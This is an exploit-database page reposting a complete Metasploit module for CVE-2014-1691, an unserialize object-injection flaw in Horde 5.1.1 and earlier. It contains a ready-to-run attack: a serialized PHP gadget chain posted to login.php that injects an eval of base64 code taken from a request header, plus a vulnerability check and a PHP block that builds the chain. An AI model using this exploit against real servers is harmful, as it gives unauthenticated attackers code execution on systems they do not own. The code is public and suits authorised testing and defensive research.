Advertisement






Horde Framework Unserialize PHP Code Execution

CVE Category Price Severity
CVE-2014-1691 CWE-915 $5,000 High
Author Risk Exploitation Type Date
Alyssa Herrera High Remote 2014-03-21
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2014030175

Below is a copy:

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Horde Framework Unserialize PHP Code Execution',
      'Description'    => %q{
        This module exploits a php unserialize() vulnerability in Horde <= 5.1.1 which could be
        abused to allow unauthenticated users to execute arbitrary code with the permissions of
        the web server. The dangerous unserialize() exists in the 'lib/Horde/Variables.php' file.
        The exploit abuses the __destruct() method from the Horde_Kolab_Server_Decorator_Clean
        class to reach a dangerous call_user_func() call in the Horde_Prefs class.
      },
      'Author'         =>
        [
          'EgiX', # Exploitation technique and Vulnerability discovery (originally reported by the vendor)
          'juan vazquez' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2014-1691' ],
          [ 'URL', 'http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection' ],
          [ 'URL', 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=737149' ],
          [ 'URL', 'https://github.com/horde/horde/commit/da6afc7e9f4e290f782eca9dbca794f772caccb3' ]
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Payload'        =>
        {
          'DisableNops' => true
        },
      'Targets'        => [ ['Horde 5', { }], ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 27 2013'
      ))

      register_options(
        [
          OptString.new('TARGETURI', [ true, "The base path to Horde", "/horde/"])
        ], self.class)
  end

  def check
    flag = rand_text_alpha(rand(10)+20)
    res = send_request_exploit("print #{flag};die;")
    if res and res.body and res.body.to_s =~ /#{flag}/
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    print_status("#{peer} - Testing injection...")
    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, "#{peer} - Target isn't vulnerable, exiting...")
    end

    print_status("#{peer} - Exploiting the unserialize()...")
    send_request_exploit(payload.encoded)
  end

  def send_request_exploit(p)
    php_injection = "eval(base64_decode($_SERVER[HTTP_CMD]));die();"

    payload_serialized = "O:34:\"Horde_Kolab_Server_Decorator_Clean\":2:{s:43:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_server\";"
    payload_serialized << "O:20:\"Horde_Prefs_Identity\":2:{s:9:\"\x00*\x00_prefs\";O:11:\"Horde_Prefs\":2:{s:8:\"\x00*\x00_opts\";a:1:{s:12:\"sizecallback\";"
    payload_serialized << "a:2:{i:0;O:12:\"Horde_Config\":1:{s:13:\"\x00*\x00_oldConfig\";s:#{php_injection.length}:\"#{php_injection}\";}i:1;s:13:\"readXMLConfig\";}}"
    payload_serialized << "s:10:\"\x00*\x00_scopes\";a:1:{s:5:\"horde\";O:17:\"Horde_Prefs_Scope\":1:{s:9:\"\x00*\x00_prefs\";a:1:{i:0;i:1;}}}}"
    payload_serialized << "s:13:\"\x00*\x00_prefnames\";a:1:{s:10:\"identities\";i:0;}}s:42:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_added\";a:1:{i:0;i:1;}}"

    send_request_cgi(
      {
        'uri'       => normalize_uri(target_uri.path.to_s, "login.php"),
        'method'    => 'POST',
        'vars_post' => {
          '_formvars' => payload_serialized
        },
        'headers' => {
          'Cmd' => Rex::Text.encode_base64(p)
        }
      })
  end
end

=begin

PHP chain by EgiX: http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection

class Horde_Config
{
   protected $_oldConfig = "phpinfo();die;";
}

class Horde_Prefs_Scope
{
   protected $_prefs = array(1);
}

class Horde_Prefs
{
   protected $_opts, $_scopes;

   function __construct()
   {
      $this->_opts['sizecallback'] = array(new Horde_Config, 'readXMLConfig');
      $this->_scopes['horde'] = new Horde_Prefs_Scope;
   }
}

class Horde_Prefs_Identity
{
   protected $_prefs, $_prefnames;

   function __construct()
   {
      $this->_prefs = new Horde_Prefs;
      $this->_prefnames['identities'] = 0;
   }
}

class Horde_Kolab_Server_Decorator_Clean
{
   private $_server, $_added = array(1);

   function __construct()
   {
      $this->_server = new Horde_Prefs_Identity;
   }
}

$popchain = serialize(new Horde_Kolab_Server_Decorator_Clean);

=end

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum